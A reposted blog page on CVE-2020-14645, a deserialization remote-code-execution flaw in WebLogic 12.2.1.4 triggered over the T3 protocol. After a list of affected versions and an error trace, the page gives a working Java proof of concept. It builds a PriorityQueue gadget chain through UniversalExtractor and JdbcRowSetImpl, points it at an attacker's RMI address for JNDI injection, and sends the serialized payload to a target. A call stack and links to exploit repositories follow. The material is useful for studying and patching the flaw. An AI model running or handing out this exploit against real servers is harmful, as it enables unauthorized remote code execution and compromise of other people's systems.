[CVE-2020-14645] weblogic coherence deserialize RCE via t3

Others 2020-10-14 20:47:25 views: null

This influence is not too big, after all, not many people use 12.2.1.4.
Affected version:

  • Weblogic 12.2.1.4.x
    Weblogic 12.2.1.4.0 Coherence component-specific class com.tangosol.util.extractor.UniversalExtractor, so it can only affect Weblogic 12.2.1.4.x

  • JDK <6u211/7u201/8u191
    is jndi injection, so it only affects JDK versions before JEP290

Insert picture description here

Insert picture description here
Demo
Insert picture description here

Weblogic error message:

(Wrapped: com.sun.rowset.JdbcRowSetImpl.databaseMetaData(com.sun.rowset.JdbcRowSetImpl@6e9f27dc)) java.lang.reflect.InvocationTargetException
        at com.tangosol.util.Base.ensureRuntimeException(Base.java:324)
        at com.tangosol.util.extractor.UniversalExtractor.extract(UniversalExtractor.java:183)
        at com.tangosol.util.comparator.ExtractorComparator.compare(ExtractorComparator.java:71)
        at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:722)
        at java.util.PriorityQueue.siftDown(PriorityQueue.java:688)
        Truncated. see log file for complete stacktrace
Caused By: java.lang.reflect.InvocationTargetException
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at com.tangosol.util.extractor.UniversalExtractor.extractComplex(UniversalExtractor.java:432)
        Truncated. see log file for complete stacktrace
Caused By: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
        at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634)
        at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        Truncated. see log file for complete stacktrace

PoC:

        UniversalExtractor universalExtractor = new UniversalExtractor("getDatabaseMetaData()");
        JdbcRowSetImpl jdbcRowSet =  new JdbcRowSetImpl();
        Class clazz1 = JdbcRowSetImpl.class.getSuperclass();
        Field dataSource = clazz1.getDeclaredField("dataSource");
        dataSource.setAccessible(true);
        dataSource.set(jdbcRowSet,rmiAddress);
        ExtractorComparator extractorComparator = new ExtractorComparator(universalExtractor);

        PriorityQueue queue = new PriorityQueue(2);

        queue.add("1");
        queue.add("1");

        Class ext = PriorityQueue.class;
        Field comparator = ext.getDeclaredField("comparator");
        comparator.setAccessible(true);
        comparator.set(queue,extractorComparator);

        Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = jdbcRowSet;

        byte[] payload = Serializables.serialize(queue);

        T3ProtocolOperation.send(target, Port,SSL, payload);

The call stack is:

getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
extractComplex:432, UniversalExtractor (com.tangosol.util.extractor)
extract:175, UniversalExtractor (com.tangosol.util.extractor)
compare:71, ExtractorComparator (com.tangosol.util.comparator)
siftDownUsingComparator:722, PriorityQueue (java.util)
siftDown:688, PriorityQueue (java.util)
heapify:737, PriorityQueue (java.util)
readObject:797, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1158, ObjectStreamClass (java.io)
readSerialData:2176, ObjectInputStream (java.io)
readOrdinaryObject:2067, ObjectInputStream (java.io)
readObject0:1571, ObjectInputStream (java.io)
readObject:431, ObjectInputStream (java.io)
readObject:73, InboundMsgAbbrev (weblogic.rjvm)
read:45, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:325, MsgAbbrevJVMConnection (weblogic.rjvm)
init:219, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:557, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:666, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:397, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:993, SocketMuxer (weblogic.socket)
readReadySocket:929, SocketMuxer (weblogic.socket)
process:599, NIOSocketMuxer (weblogic.socket)
processSockets:563, NIOSocketMuxer (weblogic.socket)
run:30, SocketReaderRequest (weblogic.socket)
execute:43, SocketReaderRequest (weblogic.socket)
execute:147, ExecuteThread (weblogic.kernel)
run:119, ExecuteThread (weblogic.kernel)

reference

  • https://www.cnblogs.com/potatsoSec/p/13307315.html
  • https://www.anquanke.com/post/id/210724
  • https://github.com/Y4er/CVE-2020-14645
  • https://github.com/DaBoQuan/CVE-2020-14645

Guess you like

Origin blog.csdn.net/caiqiiqi/article/details/107468422
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com